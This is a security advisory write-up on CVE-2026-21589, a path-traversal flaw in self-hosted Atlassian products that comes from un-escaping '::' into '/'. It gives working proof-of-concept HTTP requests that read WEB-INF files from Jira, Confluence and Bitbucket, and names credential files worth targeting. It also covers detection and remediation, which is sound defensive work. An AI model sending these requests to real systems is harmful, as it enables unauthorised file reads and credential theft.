On October 5, 2026, Atlassian issued an emergency out-of-band security advisory for CVE-2026-21589, a critical vulnerability impacting eight self-hosted Atlassian Data Center and Server product suites – including Jira Software, Confluence, Bitbucket, Jira Service Management, Bamboo, Crowd, Fisheye, and Crucible.
The flaw allows an unauthenticated remote attacker to read sensitive internal files within the application’s root deployment context.
What is Atlassian?
Atlassian is a leading global software provider that develops enterprise collaboration, issue-tracking, and software development tools widely used across software engineering, DevOps, and IT operations teams.
Core self-hosted solutions in the Atlassian enterprise ecosystem include:
- Jira Software & Jira Service Management: Enterprise issue-tracking, agile project management, and IT service desk management platforms.
- Confluence: Centralized team workspace and documentation platform used for wikis, technical specs, and knowledge sharing.
- Bitbucket: Git-based source code management and collaborative code review platform.
- Bamboo: Continuous Integration and Continuous Deployment (CI/CD) automated build and release server.
- Crowd: Centralized identity management and Single Sign-On (SSO) integration suite for managing user permissions across Atlassian applications.
Because Atlassian products form the backbone of modern enterprise software delivery pipelines, vulnerabilities affecting self-hosted Data Center installations present a high-value target for adversaries seeking access to proprietary code, environment credentials, and internal infrastructure metadata.
Technical Breakdown: How CVE-2026-21589 Works
The underlying flaw resides within a shared Atlassian library component atlassian-plugins-webresource.jar (specifically inside com.atlassian.plugin.webresource.impl.http.Router).
When processing requested web resource URLs, the application routing logic executes custom path sanitization helper functions:
public static String escapeSlashes(String string) {
return string.replaceAll("/", "::");
}
public static String unescapeSlashes(String string) {
return string.replaceAll("::", "/");
}The router un-escapes double colons (::) back into forward slashes (/) after standard web application firewall (WAF) or path validation filters have already analyzed the incoming request.
Consequently, supplying double colons (::) allows an attacker to bypass standard path traversal filters while forcing the underlying ResourceFactory logic to interpret ..:: as relative directory traversals (../).
By targeting specific plugin resource endpoints that accept arbitrary path arguments, an unauthenticated remote attacker can traverse backward through the application webroot to read protected files located in WEB-INF/.
Exploiting the jira.webresources:color-picker-popup resource plugin endpoint allows reading arbitrary files inside the web application root directory:
GET /download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
Host: {{Jira-Hostname}}Response:
HTTP/1.1 200 OK
Content-Type: application/xml
<?xml version="1.0"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
<display-name>Atlassian JIRA Web Application</display-name>
<!-- Protected Application Metadata -->
</web-app>A similar path traversal sequence targets Confluence’s dashboard action plugin resource endpoint:
GET /s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..::..::WEB-INF::web.xml HTTP/1.1
Host: {{Confluence-Hostname}}Bitbucket can be targeted via its internal Webpack avatar resource route to leak internal configuration files such as urlrewrite.xml:
GET /s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..::WEB-INF::urlrewrite.xml HTTP/1.1
Host: {{Bitbucket-Hostname}}Key Vulnerability Mechanics & Scope:
- Unauthenticated Traversal: By crafting requests containing double-colon traversal markers (e.g., ..::..::..::..::::WEB-INF/…), an remote attacker can step backward out of static asset directories without needing session authentication.
- Application Root Scope: Traversal remains confined within the application server context (such as Tomcat root), preventing OS-level reads like /etc/passwd, but exposing the entire web application deployment directory.
- Target File Path Requirements: Directory browsing or folder listing is not supported. To successfully retrieve a target resource, an attacker must supply the precise file name and exact path beforehand. Consequently, exploitation efforts focus heavily on standard, well-documented assets – such as baseline configuration files, environment property definitions, and key administrative artifacts stored in predictable installation locations.
- High-Impact File Exposure: Access to known internal paths grants direct visibility into protected configuration files, including WEB-INF/web.xml, database access configuration parameters, internal token signatures, and cached credentials (such as WEB-INF/classes/crowd.properties).
Impact & Blast Radius
Because this flaw affects shared core application dependencies across Atlassian’s product lines, virtually the entire self-hosted enterprise ecosystem is affected:
- Affected Products: Bitbucket Data Center, Confluence Data Center, Jira Software Data Center, Jira Service Management Data Center, Bamboo Data Center, Crowd Data Center, Crucible, and Fisheye.
- CVSS Severity: Critical (9.3 / No authentication required, zero user interaction).
- Post-Exploitation Risk: Access to sensitive configuration files often provides the credentials or token signing keys necessary for attackers to elevate privileges, leading to full database takeover, lateral movement across CI/CD pipelines (via Bamboo/Bitbucket), or enterprise identity compromise (via Crowd).
indicators of compromise
- Review Server Logs: Inspect web server access logs for suspicious request paths.
Decode URLs: Atlassian recommends URL-decoding each request line up to two times and checking for sequences where two dots (..) directly border a forward slash (/), backslash (\), or double colon (::). - Look for Path Traversal Patterns: Search for request paths containing two dots (..) immediately next to a slash (/), backslash (\), or double colon (::).
Remediation & Mitigation Steps
- Apply Vendor Patches Immediately: Upgrade all instances of Jira, Confluence, Bitbucket, Bamboo, Crowd, Crucible, and Fisheye to the latest fixed Data Center versions specified in Atlassian’s Security Advisory.
- Restrict Network Exposure: Ensure management interfaces and self-hosted Atlassian instances are not exposed directly to the public internet without an authenticated identity-aware proxy or VPN where feasible.
- Inspect Application Logs: Search access logs for suspicious request patterns targeting static resource routing pathways or attempts to query WEB-INF/ references and ..:: sequences.
- Credential Rotation: If vulnerable instances were exposed to the public internet, treat sensitive secrets (database passwords, API tokens, integration keys) as potentially compromised and rotate them post-patching.
